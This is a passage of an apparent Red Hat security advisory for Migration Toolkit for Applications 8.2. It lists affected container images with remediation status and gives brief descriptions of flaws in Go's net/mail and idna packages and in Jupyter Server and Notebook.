| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64 | — |
Workaround
|
A flaw was found in the `net/mail` package of the Go programming language. An attacker could provide specially crafted inputs to the `ParseAddress`, `ParseAddressList`, or `ParseDate` functions. This could lead to excessive consumption of CPU and memory resources, resulting in a Denial of Service (DoS) for applications processing these inputs.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64 | — |
Workaround
|
A flaw was found in golang.org/x/net/idna. ToASCII and ToUnicode incorrectly accept Punycode-encoded labels that decode to an ASCII-only hostname (for example, xn--example-.com returns example.com instead of an error). Applications that validate the ASCII form then convert to Unicode may grant access to a restricted hostname the ASCII check would have rejected.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64 | — |
Workaround
|
A flaw was found in Jupyter Server. The Origin header validation, which uses Python's `re.match()` function, does not correctly validate incoming origins against allowed patterns. This allows a remote attacker to bypass Cross-Origin Resource Sharing (CORS) restrictions by crafting a malicious domain that partially matches a trusted one. Consequently, the attacker can make unauthorized cross-origin requests to the Jupyter Server API from an untrusted site, potentially leading to sensitive information disclosure or other unauthorized actions.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64 | — |
Workaround
|
A flaw was found in Jupyter Notebook and JupyterLab. A stored cross-site scripting (XSS) vulnerability in the help command linker can be exploited by an attacker who crafts a malicious notebook file. When a user interacts with this file, the XSS is triggered, allowing the attacker to steal authentication tokens. Successful exploitation can lead to a complete takeover of the Jupyter session, enabling arbitrary code execution and information disclosure.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64 | — |
Workaround
|
|
